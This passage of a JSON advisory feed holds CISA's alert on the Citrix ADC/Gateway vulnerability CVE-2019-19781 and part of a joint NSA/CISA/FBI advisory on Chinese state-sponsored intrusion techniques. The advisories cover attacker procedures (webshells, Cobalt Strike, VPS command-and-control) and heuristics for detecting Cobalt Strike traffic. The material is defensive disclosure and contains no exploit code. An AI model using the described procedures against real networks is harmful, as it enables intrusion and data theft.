10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-05-21T12:00:00", "id": "AA20-031A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-031a", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-03-14T18:37:07", "description": "### Summary\n\n_Note: As of January 24, 2020, Citrix has released all expected updates in response to CVE-2019-19781._[[1]](<https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/>)\n\nOn January 19, 2020, Citrix released firmware updates for Citrix Application Delivery Controller (ADC) and Citrix Gateway versions 11.1 and 12.0. \nOn January 22, 2020, Citrix released security updates for vulnerable SD-WAN WANOP appliances. \nOn January 23, 2020, Citrix released firmware updates for Citrix ADC and Gateway versions 12.1 and 13.0. \nOn January 24, 2020, Citrix released firmware updates for Citrix ADC and Gateway version 10.5.\n\nA remote, unauthenticated attacker could exploit CVE-2019-19781 to perform arbitrary code execution.[[2]](<https://support.citrix.com/article/CTX267027>) This vulnerability has been detected in exploits in the wild.[[3]](<https://www.ncsc.gov.uk/news/citrix-alert>)\n\nThe Cybersecurity and Infrastructure Agency (CISA) strongly recommends that all users and administrators upgrade their vulnerable appliances as soon as possible.\n\n#### Timeline of Specific Events\n\n * December 17, 2019 \u2013 Citrix released Security Bulletin CTX267027 with mitigations steps.\n * January 8, 2020 \u2013 The CERT Coordination Center (CERT/CC) released Vulnerability Note VU#619785: Citrix Application Delivery Controller and Citrix Gateway Web Server Vulnerability,[[4]](<https://www.kb.cert.org/vuls/id/619785/>) and CISA releases a Current Activity entry.[[5]](<https://www.us-cert.gov/ncas/current-activity/2020/01/08/citrix-application-delivery-controller-and-citrix-gateway>)\n * January 10, 2020 \u2013 The National Security Agency (NSA) released a Cybersecurity Advisory on CVE-2019-19781.[[6]](<https://media.defense.gov/2020/Jan/10/2002233132/-1/-1/0/CSA%20FOR%20CITRIXADCANDCITRIXGATEWAY_20200109.PDF>)\n * January 11, 2020 \u2013 Citrix released blog post on CVE-2019-19781 with timeline for fixes.[[7]](<https://www.citrix.com/blogs/2020/01/11/citrix-provides-update-on-citrix-adc-citrix-gateway-vulnerability/>)\n * January 13, 2020 \u2013 CISA released a Current Activity entry describing their utility that enables users and administrators to test whether their Citrix ADC and Citrix Gateway firmware is susceptible to the CVE-2019-19781 vulnerability.[[8]](<https://www.us-cert.gov/ncas/current-activity/2020/01/13/cisa-releases-test-citrix-adc-and-gateway-vulnerability>)\n * January 16, 2020 \u2013 Citrix announced that Citrix SD-WAN WANOP appliance is also vulnerable to CVE-2019-19781.\n * January 19, 2020 \u2013 Citrix released firmware updates for Citrix ADC and Citrix Gateway versions 11.1 and 12.0 and blog post on accelerated schedule for fixes.[[9]](<https://www.citrix.com/blogs/2020/01/19/vulnerability-update-first-permanent-fixes-available-timeline-accelerated/>)\n * January 22, 2020 \u2013 Citrix released security updates for Citrix SD-WAN WANOP release 10.2.6 and 11.0.3.[[10]](<https://www.citrix.com/blogs/2020/01/22/update-on-cve-2019-19781-fixes-now-available-for-citrix-sd-wan-wanop/>)\n * January 22, 2020 \u2013 Citrix and FireEye Mandiant released an indicator of compromise (IOC) scanning tool for CVE-2019-19781.[[11]](<https://www.citrix.com/blogs/2020/01/22/citrix-and-fireeye-mandiant-share-forensic-tool-for-cve-2019-19781/>)\n * January 23, 2020 \u2013 Citrix released firmware updates for Citrix ADC and Citrix Gateway versions 12.1 and 13.0.[[12]](<https://www.citrix.com/blogs/2020/01/23/fixes-now-available-for-citrix-adc-citrix-gateway-versions-12-1-and-13-0/>)\n * January 24, 2020 \u2013 Citrix released firmware updates for Citrix ADC and Citrix Gateway version 10.5.\n\n### Technical Details\n\n#### Impact\n\nOn December 17, 2019, Citrix reported vulnerability CVE-2019-19781. A remote, unauthenticated attacker could exploit this vulnerability to perform arbitrary code execution. This vulnerability has been detected in exploits in the wild.\n\nThe vulnerability affects the following appliances:\n\n * Citrix NetScaler ADC and NetScaler Gateway version 10.5 \u2013 all supported builds before 10.5.70.12\n * Citrix ADC and NetScaler Gateway version 11.1 \u2013 all supported builds before 11.1.63.15\n * Citrix ADC and NetScaler Gateway version 12.0 \u2013 all supported builds before 12.0.63.13\n * Citrix ADC and NetScaler Gateway version 12.1 \u2013 all supported builds before 12.1.55.18\n * Citrix ADC and Citrix Gateway version 13.0 \u2013 all supported builds before 13.0.47.24\n * Citrix SD-WAN WANOP appliance models 4000-WO, 4100-WO, 5000-WO, and 5100-WO \u2013 all supported software release builds before 10.2.6b and 11.0.3b. (Citrix SD-WAN WANOP is vulnerable because it packages Citrix ADC as a load balancer).\n\n#### Detection Measures\n\nCitrix and FireEye Mandiant released an [IOC scanning tool for CVE-2019-19781](<https://github.com/citrix/ioc-scanner-CVE-2019-19781/>) on January 22, 2020. The tool aids customers with detecting potential IOCs based on known attacks and exploits.[[13]](<https://www.citrix.com/blogs/2020/01/22/citrix-and-fireeye-mandiant-share-forensic-tool-for-cve-2019-19781/>)\n\nSee the National Security Agency\u2019s Cybersecurity Advisory on CVE-2019-19781 for other detection measures.[[14]](<https://media.defense.gov/2020/Jan/10/2002233132/-1/-1/0/CSA%20FOR%20CITRIXADCANDCITRIXGATEWAY_20200109.PDF>)\n\nCISA released a utility that enables users and administrators to detect whether their Citrix ADC and Citrix Gateway firmware is susceptible to CVE-2019-19781.[[15] ](<https://www.us-cert.gov/ncas/current-activity/2020/01/13/cisa-releases-test-citrix-adc-and-gateway-vulnerability>)CISA encourages administrators to visit CISA\u2019s [GitHub page](<https://github.com/cisagov/check-cve-2019-19781>) to download and run the tool.\n\n### Mitigations\n\nCISA strongly recommends users and administrators update Citrix ADC, Citrix Gateway, and Citrix SD-WAN WANOP as soon as possible.\n\nThe fixed builds can be downloaded from Citrix Downloads pages for [Citrix ADC](<https://www.citrix.com/downloads/citrix-adc/>), [Citrix Gateway](<https://www.citrix.com/downloads/citrix-gateway/>), and [Citrix SD-WAN](<https://www.citrix.com/downloads/citrix-sd-wan/>).\n\nUntil the appropriate update is implemented, users and administrators should apply Citrix\u2019s interim mitigation steps for CVE-2019-19781.[[16]](<https://support.citrix.com/article/CTX267679>) Verify the successful application of the above mitigations by using the tool in [CTX269180 \u2013 CVE-2019-19781 \u2013 Verification ToolTest](<https://support.citrix.com/article/CTX269180>).** Note:** these mitigation steps apply to Citrix ADC and SD-WAN WANOP deployments.[[17]](<https://support.citrix.com/article/CTX267027>)\n\nRefer to table 1 for Citrix\u2019s fix schedule.[[18]](<https://support.citrix.com/article/CTX267027>)\n\n**Table 1. Fix schedule for Citrix appliances vulnerable to CVE-2019-19781**\n\n**Vulnerable Appliance** | **Firmware Update** | **Release Date** \n---|---|--- \nCitrix ADC and Citrix Gateway version 10.5 | Refresh Build 10.5.70.12 | January 24, 2020 \nCitrix ADC and Citrix Gateway version 11.1 | Refresh Build 11.1.63.15 | January 19, 2020 \nCitrix ADC and Citrix Gateway version 12.0 | Refresh Build 12.0.63.13 | January 19, 2020 \nCitrix ADC and Citrix Gateway version 12.1 | Refresh Build 12.1.55.18 | January 23, 2020 \nCitrix ADC and Citrix Gateway version 13.0 | Refresh Build 13.0.47.24 | January 23, 2020 \nCitrix SD-WAN WANOP Release 10.2.6 | Build 10.2.6b | January 22, 2020 \nCitrix SD-WAN WANOP Release 11.0.3 | Build 11.0.3b | January 22, 2020 \n \nAdministrators should review NSA\u2019s [Citrix Advisory](<https://media.defense.gov/2020/Jan/10/2002233132/-1/-1/0/CSA%20FOR%20CITRIXADCANDCITRIXGATEWAY_20200109.PDF>) for other mitigations, such as applying the following defense-in-depth strategy:\n\n\u201cConsider deploying a VPN capability using standardized protocols, preferably ones listed on the National Information Assurance Partnership (NIAP) Product Compliant List (PCL), in front of publicly accessible Citrix ADC and Citrix Gateway appliances to require user authentication for the VPN before being able to reach these appliances. Use of a proprietary SSLVPN/TLSVPN is discouraged.\u201d\n\n### References\n\n[[1] Citrix blog: Citrix releases final fixes for CVE-2019-19781](<https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/>)\n\n[[2] Citrix Security Bulletin CTX267027, Vulnerability in Citrix Application Delivery Controller and Citrix Gateway ](<https://support.citrix.com/article/CTX267027>)\n\n[[3] United Kingdom National Cyber Secrity Centre (NCSC) Alert: Actors exploiting Citrix products vulnerability ](<https://www.ncsc.gov.uk/news/citrix-alert>)\n\n[[4] CERT/CC Vulnerability Note VU#619785 ](<https://www.kb.cert.org/vuls/id/619785/>)\n\n[[5] CISA Current Activity: Citrix Application Delivery Controller and Citrix Gateway Vulnerability ](<https://www.us-cert.gov/ncas/current-activity/2020/01/08/citrix-application-delivery-controller-and-citrix-gateway>)\n\n[[6] NSA Cybersecurity Advisory: Mitigate CVE-2019-19781: Critical Vulnerability in Citrix Application Delivery Controller (ADC) and Citrix Gateway ](<https://media.defense.gov/2020/Jan/10/2002233132/-1/-1/0/CSA%20FOR%20CITRIXADCANDCITRIXGATEWAY_20200109.PDF>)\n\n[[7] Citrix blog: Citrix provides update on Citrix ADC, Citrix Gateway vulnerability ](<https://www.citrix.com/blogs/2020/01/11/citrix-provides-update-on-citrix-adc-citrix-gateway-vulnerability/>)\n\n[[8] CISA Current Activity: CISA Releases Test for Citrix ADC and Gateway Vulnerability GitHub: CISAgov \u2013 check-cve-2019-19781 ](<https://www.us-cert.gov/ncas/current-activity/2020/01/13/cisa-releases-test-citrix-adc-and-gateway-vulnerability>)\n\n[[9] Citrix Blog: Vulnerability Update: First permanent fixes available, timeline accelerated ](<https://www.citrix.com/blogs/2020/01/19/vulnerability-update-first-permanent-fixes-available-timeline-accelerated/>)\n\n[[10] Citrix Blog: Update on CVE-2019-19781: Fixes now available for Citrix SD-WAN WANOP](<https://www.citrix.com/blogs/2020/01/22/update-on-cve-2019-19781-fixes-now-available-for-citrix-sd-wan-wanop/>)\n\n[[11] Citrix Blog: Citrix and FireEye Mandiant share forensic tool for CVE-2019-19781](<https://www.citrix.com/blogs/2020/01/22/citrix-and-fireeye-mandiant-share-forensic-tool-for-cve-2019-19781/>)\n\n[[12] Citrix Blog: Fixes now available for Citrix ADC, Citrix Gateway versions 12.1 and 13.0](<https://www.citrix.com/blogs/2020/01/23/fixes-now-available-for-citrix-adc-citrix-gateway-versions-12-1-and-13-0/>)\n\n[[13] Citrix Blog: Citrix and FireEye Mandiant share forensic tool for CVE-2019-19781](<https://www.citrix.com/blogs/2020/01/22/citrix-and-fireeye-mandiant-share-forensic-tool-for-cve-2019-19781/>)\n\n[[14] NSA Cybersecurity Advisory: Mitigate CVE-2019-19781: Critical Vulnerability in Citrix Application Delivery Controller (ADC) and Citrix Gateway ](<https://media.defense.gov/2020/Jan/10/2002233132/-1/-1/0/CSA%20FOR%20CITRIXADCANDCITRIXGATEWAY_20200109.PDF>)\n\n[[15] CISA Current Activity: CISA Releases Test for Citrix ADC and Gateway Vulnerability GitHub: CISAgov \u2013 check-cve-2019-19781 ](<https://www.us-cert.gov/ncas/current-activity/2020/01/13/cisa-releases-test-citrix-adc-and-gateway-vulnerability>)\n\n[[16] Citrix Security Bulletin CTX267679, Mitigation Steps for CVE-2019-19781 ](<https://support.citrix.com/article/CTX267679>)\n\n[[17] Citrix Security Bulletin CTX267027, Vulnerability in Citrix Application Delivery Controller and Citrix Gateway ](<https://support.citrix.com/article/CTX267027>)\n\n[[18] Citrix Security Bulletin CTX267027, Vulnerability in Citrix Application Delivery Controller and Citrix Gateway ](<https://support.citrix.com/article/CTX267027>)\n\n### Revisions\n\nJanuary 20, 2020: Initial Version|January 23, 2020: Updated with information about Citrix releasing fixes for SD-WAN WANOP appliances and an IOC scanning tool|January 24, 2020: Updated with information about Citrix releasing fixes for Citrix ADC and Gateway versions 10.5, 12.1, and 13.0|January 27, 2020: Updated vulnernable versions of ADC and Gateway version 10.5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-05-21T12:00:00", "type": "ics", "title": "Critical Vulnerability in Citrix Application Delivery Controller, Gateway, and SD-WAN WANOP", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-05-21T12:00:00", "id": "AA20-020A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-020a", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-03-14T18:31:25", "description": "### Summary\n\n_This advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK\u00ae) framework, Version 9, and MITRE D3FEND\u2122 framework, version 0.9.2-BETA-3. See the [ATT&CK for Enterprise](<https://attack.mitre.org/versions/v8/techniques/enterprise/>) for all referenced threat actor tactics and techniques and the [D3FEND framework](<https://d3fend.mitre.org/>) for referenced defensive tactics and techniques._\n\nThe National Security Agency, Cybersecurity and Infrastructure Security Agency (CISA), and Federal Bureau of Investigation (FBI) assess that People\u2019s Republic of China state-sponsored malicious cyber activity is a major threat to U.S. and Allied cyberspace assets. Chinese state-sponsored cyber actors aggressively target U.S. and allied political, economic, military, educational, and critical infrastructure (CI) personnel and organizations to steal sensitive data, critical and emerging key technologies, intellectual property, and personally identifiable information (PII). Some target sectors include managed service providers, semiconductor companies, the Defense Industrial Base (DIB), universities, and medical institutions. These cyber operations support China\u2019s long-term economic and military development objectives.\n\nThis Joint Cybersecurity Advisory (CSA) provides information on tactics, techniques, and procedures (TTPs) used by Chinese state-sponsored cyber actors. This advisory builds on previous NSA, CISA, and FBI reporting to inform federal, state, local, tribal, and territorial (SLTT) government, CI, DIB, and private industry organizations about notable trends and persistent TTPs through collaborative, proactive, and retrospective analysis.\n\nTo increase the defensive posture of their critical networks and reduce the risk of Chinese malicious cyber activity, NSA, CISA, and FBI urge government, CI, DIB, and private industry organizations to apply the recommendations listed in the Mitigations section of this advisory and in Appendix A: Chinese State-sponsored Cyber Actors' Observed Procedures. **Note:** NSA, CISA, and FBI encourage organization leaders to review [CISA Joint Insights: Chinese Malicious Cyber Activity: Threat Overview for Leaders](<https://www.cisa.gov/publication/chinese-cyber-threat-overview-and-actions-leaders>) for information on this threat to their organization.\n\n[Click here](<https://media.defense.gov/2021/Jul/19/2002805003/-1/-1/1/CSA_CHINESE_STATE-SPONSORED_CYBER_TTPS.PDF>) for a PDF version of this report.\n\n### Technical Details\n\n#### **Trends in Chinese State-Sponsored Cyber Operations**\n\nNSA, CISA, and FBI have observed increasingly sophisticated Chinese state-sponsored cyber activity targeting U.S. political, economic, military, educational, and CI personnel and organizations. NSA, CISA, and FBI have identified the following trends in Chinese state-sponsored malicious cyber operations through proactive and retrospective analysis:\n\n * **Acquisition of Infrastructure and Capabilities**. Chinese state-sponsored cyber actors remain agile and cognizant of the information security community\u2019s practices. These actors take effort to mask their activities by using a revolving series of virtual private servers (VPSs) and common open-source or commercial penetration tools.\n\n * **Exploitation of Public Vulnerabilities. **Chinese state-sponsored cyber actors consistently scan target networks for critical and high vulnerabilities within days of the vulnerability\u2019s public disclosure. In many cases, these cyber actors seek to exploit vulnerabilities in major applications, such as Pulse Secure, Apache, F5 Big-IP, and Microsoft products. For information on Common Vulnerabilities and Exposures (CVE) known to be exploited by malicious Chinese state-sponsored cyber actors, see:\n\n * CISA-FBI Joint CSA AA20-133A: [Top 10 Routinely Exploited Vulnerabilities](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a>),\n\n * CISA Activity Alert: AA20-275A: [Potential for China Cyber Response to Heightened U.S.-China Tensions](<https://us-cert.cisa.gov/ncas/alerts/aa20-275a>), and\n\n * NSA CSA U/OO/179811-20: [Chinese State-Sponsored Actors Exploit Publicly Known Vulnerabilities](<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>).\n\n * **Encrypted Multi-Hop Proxies. **Chinese state-sponsored cyber actors have been routinely observed using a VPS as an encrypted proxy. The cyber actors use the VPS as well as small office and home office (SOHO) devices as operational nodes to evade detection.\n\n#### **Observed Tactics and Techniques**\n\nChinese state-sponsored cyber actors use a full array of tactics and techniques to exploit computer networks of interest worldwide and to acquire sensitive intellectual property, economic, political, and military information. Appendix B: MITRE ATT&CK Framework lists the tactics and techniques used by Chinese state-sponsored cyber actors. A downloadable [JSON file](<https://github.com/nsacyber/chinese-state-sponsored-cyber-operations-observed-ttps>) is also available on the [NSA Cybersecurity GitHub page](<https://github.com/nsacyber>).\n\nRefer to Appendix A: Chinese State-Sponsored Cyber Actors\u2019 Observed Procedures for information on procedures affiliated with these tactics and techniques as well as applicable mitigations.\n\n\n\n_Figure 1: Example of tactics and techniques used in various cyber operations._\n\n### Mitigations\n\nNSA, CISA, and FBI urge federal and SLTT government, CI, DIB, and private industry organizations to apply the following recommendations as well as the detection and mitigation recommendations in Appendix A, which are tailored to observed tactics and techniques:\n\n * **Patch systems and equipment promptly and diligently. **Focus on patching critical and high vulnerabilities that allow for remote code execution or denial-of-service on externally facing equipment and CVEs known to be exploited by Chinese state-sponsored cyber actors. Consider implementing a patch management program that enables a timely and thorough patching cycle. \n**Note: **for more information on CVEs routinely exploited by Chinese state-sponsored cyber actors refer to the resources listed in the Trends in Chinese State-Sponsored Cyber Operations section.\n\n * **Enhance monitoring of network traffic, email, and endpoint systems.** Review network signatures and indicators for focused activities, monitor for new phishing themes, and adjust email rules accordingly. Follow the best practices of restricting attachments via email and blocking URLs and domains based upon reputation. Ensure that log information is aggregated and correlated to enable maximum detection capabilities, with a focus on monitoring for account misuse. Monitor common ports and protocols for command and control (C2) activity. SSL/TLS inspection can be used to see the contents of encrypted sessions to look for network-based indicators of malware communication protocols. Implement and enhance network and endpoint event analysis and detection capabilities to identify initial infections, compromised credentials, and the manipulation of endpoint processes and files.\n * **Use protection capabilities to stop malicious activity. **Implement anti-virus software and other endpoint protection capabilities to automatically detect and prevent malicious files from executing. Use a network intrusion detection and prevention system to identify and prevent commonly employed adversarial malware and limit nefarious data transfers. Use a domain reputation service to detect suspicious or malicious domains. Use strong credentials for service accounts and multi-factor authentication (MFA) for remote access to mitigate an adversary's ability to leverage stolen credentials, but be aware of MFA interception techniques for some MFA implementations.\u25aa\n\n### Resources\n\nRefer to [us-cert.cisa.gov/china](<https://us-cert.cisa.gov/china>), <https://www.ic3.gov/Home/IndustryAlerts>, and [https://www.nsa.gov/What-We-Do/Cybersecurity/Advisories-Technical-Guidance/ ](<https://www.nsa.gov/What-We-Do/Cybersecurity/Advisories-Technical-Guidance/>)for previous reporting on Chinese state-sponsored malicious cyber activity.\n\n### Disclaimer of Endorsement\n\nThe information and opinions contained in this document are provided \"as is\" and without any warranties or guarantees. Reference herein to any specific commercial products, process, or service by trade name, trademark, manufacturer, or otherwise, does not constitute or imply its endorsement, recommendation, or favoring by the United States Government, and this guidance shall not be used for advertising or product endorsement purposes.\n\n### Purpose\n\nThis document was developed by NSA, CISA, and FBI in furtherance of their respective cybersecurity missions, including their responsibilities to develop and issue cybersecurity specifications and mitigations. This information may be shared broadly to reach all appropriate stakeholders. \nThis document is marked TLP:WHITE. Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol, see [http://www.us-cert.gov/tlp/.](<http://www.us-cert.gov/tlp/>)\n\n### Trademark Recognition\n\nMITRE and ATT&CK are registered trademarks of The MITRE Corporation. \u2022 D3FEND is a trademark of The MITRE Corporation. \u2022 Microsoft, Microsoft Exchange, Office 365, Microsoft Office, OneDrive, Outlook, OWA, PowerShell, Windows Defender, and Windows are registered trademarks of Microsoft Corporation. \u2022 Pulse Secure is a registered trademark of Pulse Secure, LLC. \u2022 Apache is a registered trademark of Apache Software Foundation. \u2022 F5 and BIG-IP are registered trademarks of F5 Networks. \u2022 Cobalt Strike is a registered trademark of Strategic Cyber LLC. \u2022 GitHub is a registered trademark of GitHub, Inc. \u2022 JavaScript is a registered trademark of Oracle Corporation. \u2022 Python is a registered trademark of Python Software Foundation. \u2022 Unix is a registered trademark of The Open Group. \u2022 Linux is a registered trademark of Linus Torvalds. \u2022 Dropbox is a registered trademark of Dropbox, Inc.\n\n### APPENDIX A: Chinese State-Sponsored Cyber Actors\u2019 Observed Procedures\n\n**Note: **D3FEND techniques are based on the Threat Actor Procedure(s) and may not match automated mappings to ATT&CK techniques and sub-techniques.\n\n### Tactics: _Reconnaissance_ [[TA0043](<https://attack.mitre.org/versions/v9/tactics/TA0043>)] \n\n_Table 1: Chinese state-sponsored cyber actors\u2019 Reconnaissance TTPs with detection and mitigation recommendations_\n\nThreat Actor \nTechnique / Sub-Techniques\n\n| \n\nThreat Actor Procedure(s)\n\n| \n\nDetection and Mitigation Recommendations\n\n| \n\nDefensive Tactics and Techniques \n \n---|---|---|--- \n \nActive Scanning [[T1595](<https://attack.mitre.org/versions/v9/techniques/T1595>)] \n\n| \n\nChinese state-sponsored cyber actors have been assessed to perform reconnaissance on Microsoft\u00ae 365 (M365), formerly Office\u00ae 365, resources with the intent of further gaining information about the networks. These scans can be automated, through Python\u00ae scripts, to locate certain files, paths, or vulnerabilities. The cyber actors can gain valuable information on the victim network, such as the allocated resources, an organization\u2019s fully qualified domain name, IP address space, and open ports to target or exploit.\n\n| \n\nMinimize the amount and sensitivity of data available to external parties, for example: \n\n * Scrub user email addresses and contact lists from public websites, which can be used for social engineering, \n\n * Share only necessary data and information with third parties, and \n\n * Monitor and limit third-party access to the network. \n\nActive scanning from cyber actors may be identified by monitoring network traffic for sources associated with botnets, adversaries, and known bad IPs based on threat intelligence.\n\n| \n\nDetect: \n\n * Network Traffic Analysis\n\n * Connection Attempt Analysis [[D3-CAA](<https://d3fend.mitre.org/technique/d3f:ConnectionAttemptAnalysis>)]\n\nIsolate: \n\n * Network Isolation\n\n * Inbound Traffic Filtering [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering>)] \n \nGather Victim Network Information [[T1590](<https://attack.mitre.org/versions/v9/techniques/T1590>)] \n \n### Tactics: _Resource Development_ [[TA0042](<https://attack.mitre.org/versions/v9/tactics/TA0042>)]\n\n_Table II: Chinese state-sponsored cyber actors\u2019 Resource Development TTPs with detection and mitigation recommendations_\n\nThreat Actor \nTechnique / Sub-Techniques\n\n| \n\nThreat Actor Procedure(s)\n\n| \n\nDetection and Mitigation Recommendations\n\n| Defensive Tactics and Techniques \n---|---|---|--- \n \nAcquire Infrastructure [[T1583](<https://attack.mitre.org/versions/v9/techniques/T1583>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using VPSs from cloud service providers that are physically distributed around the world to host malware and function as C2 nodes.\n\n| \n\nAdversary activities occurring outside the organization\u2019s boundary of control and view makes mitigation difficult. Organizations can monitor for unexpected network traffic and data flows to and from VPSs and correlate other suspicious activity that may indicate an active threat.\n\n| \n\nN/A \n \nStage Capabilities [[T1608](<https://attack.mitre.org/versions/v9/techniques/T1608>)] \n \nObtain Capabilities [[T1588](<https://attack.mitre.org/versions/v9/techniques/T1588>)]: \n\n * Tools [[T1588.002](<https://attack.mitre.org/versions/v9/techniques/T1588/002>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using Cobalt Strike\u00ae and tools from GitHub\u00ae on victim networks. \n\n| \n\nOrganizations may be able to identify malicious use of Cobalt Strike by:\n\n * Examining network traffic using Transport Layer Security (TLS) inspection to identify Cobalt Strike. Look for human generated vice machine-generated traffic, which will be more uniformly distributed. \n\n * Looking for the default Cobalt Strike TLS certificate. \n\n * Look at the user agent that generates the TLS traffic for discrepancies that may indicate faked and malicious traffic.\n\n * Review the traffic destination domain, which may be malicious and an indicator of compromise.\n\n * Look at the packet's HTTP host header. If it does not match with the destination domain, it may indicate a fake Cobalt Strike header and profile.\n\n * Check the Uniform Resource Identifier (URI) of the flow to see if it matches one associated with Cobalt Strike's malleable C2 language. If discovered, additional recovery and investigation will be required.\n\n| N/A \n \n### Tactics: _Initial Access_ [[TA0001](<https://attack.mitre.org/versions/v9/tactics/TA0001/>)]\n\n_Table III: Chinese state-sponsored cyber actors\u2019 Initial Access TTPs with detection and mitigation recommendations_\n\nThreat Actor Technique / \nSub-Techniques\n\n| \n\nThreat Actor Procedure(s)\n\n| \n\nDetection and Mitigation Recommendations\n\n| \n\nDetection and Mitigation Recommendations \n \n---|---|---|--- \n \nDrive By Compromise [[T1189](<https://attack.mitre.org/versions/v9/techniques/T1189>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed gaining access to victim networks through watering hole campaigns of typo-squatted domains.\n\n| \n\n * Ensure all browsers and plugins are kept up to date.\n * Use modern browsers with security features turned on.\n * Restrict the use of unneeded websites, block unneeded downloads/attachments, block unneeded JavaScript\u00ae, restrict browser extensions, etc.\n * Use adblockers to help prevent malicious code served through advertisements from executing. \n * Use script blocking extensions to help prevent the execution of unneeded JavaScript, which may be used during exploitation processes. \n * Use browser sandboxes or remote virtual environments to mitigate browser exploitation.\n * Use security applications that look for behavior used during exploitation, such as Windows Defender\u00ae Exploit Guard (WDEG).\n| \n\nDetect: \n\n * Identifier Analysis \n * Homoglyph Detection [[D3-HD](<https://d3fend.mitre.org/technique/d3f:HomoglyphDetection>)]\n * URL Analysis [[D3-UA](<https://d3fend.mitre.org/technique/d3f:URLAnalysis>)]\n * File Analysis \n * Dynamic Analysis [[D3-DA](<https://d3fend.mitre.org/technique/d3f:DynamicAnalysis>)]\n\nIsolate: \n\n * Execution Isolation \n * Hardware-based Process Isolation [[D3-HBPI](<https://d3fend.mitre.org/technique/d3f:Hardware-basedProcessIsolation>)]\n * Executable Allowlisting [[D3-EAL](<https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting>)]\n * Network Isolation \n * DNS Denylisting [[D3-DNSDL](<https://d3fend.mitre.org/technique/d3f:DNSDenylisting>)] \n * Outbound Traffic Filtering [[D3-OTF](<https://d3fend.mitre.org/technique/d3f:OutboundTrafficFiltering>)] \n \nExploit Public-Facing Application [[T1190](<https://attack.mitre.org/versions/v9/techniques/T1190>)]\n\n| \n\nChinese state-sponsored cyber actors have exploited known vulnerabilities in Internet-facing systems.[[1](<https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html >)] For information on vulnerabilities known to be exploited by Chinese state-sponsored cyber actors, refer to the Trends in Chinese State-Sponsored Cyber Operations section for a list of resources. \nChinese state-sponsored cyber actors have also been observed:\n\n * Using short-term VPS devices to scan and exploit vulnerable Microsoft Exchange\u00ae Outlook Web Access (OWA\u00ae) and plant webshells.\n\n * Targeting on-premises Identity and Access Management (IdAM) and federation services in hybrid cloud environments to gain access to cloud resources.\n\n * Deploying a public proof of concept (POC) exploit targeting a public-facing appliance vulnerability.\n\n| \n\nReview previously published alerts and advisories from NSA, CISA, and FBI, and diligently patch vulnerable applications known to be exploited by cyber actors. Refer to the Trends in Chinese State-Sponsored Cyber Operations section for a non-inclusive list of resources.\n\nAdditional mitigations include:\n\n * Consider implementing Web Application Firewalls (WAF), which can prevent exploit traffic from reaching an application.\n * Segment externally facing servers and services from the rest of the network with a demilitarized zone (DMZ).\n * Use multi-factor authentication (MFA) with strong factors and require regular re-authentication.\n * Disable protocols using weak authentication.\n * Limit access to and between cloud resources with the desired state being a Zero Trust model. For more information refer to NSA Cybersecurity Information Sheet: [[Embracing a Zero Trust Security Model](<https://media.defense.gov/2021/Feb/25/2002588479/-1/-1/0/CSI_EMBRACING_ZT_SECURITY_MODEL_UOO115131-21.PDF>)].\n * When possible, use cloud-based access controls on cloud resources (e.g., cloud service provider (CSP)-managed authentication between virtual machines).\n * Use automated tools to audit access logs for security concerns.\n * Where possible, enforce MFA for password resets.\n * Do not include Application Programing Interface (API) keys in software version control systems where they can be unintentionally leaked.\n| \n\nHarden:\n\n * Application Hardening [[D3-AH](<https://d3fend.mitre.org/technique/d3f:ApplicationHardening>)]\n * Platform Hardening \n * Software Update [[D3-SU](<https://d3fend.mitre.org/technique/d3f:SoftwareUpdate>)]\n\nDetect:\n\n * File Analysis [[D3-FA](<https://d3fend.mitre.org/technique/d3f:FileAnalysis>)] \n * Network Traffic Analysis \n * Client-server Payload Profiling [[D3-CSPP](<https://d3fend.mitre.org/technique/d3f:Client-serverPayloadProfiling>)]\n * Process Analysis \n * Process Spawn Analysis\n * Process Lineage 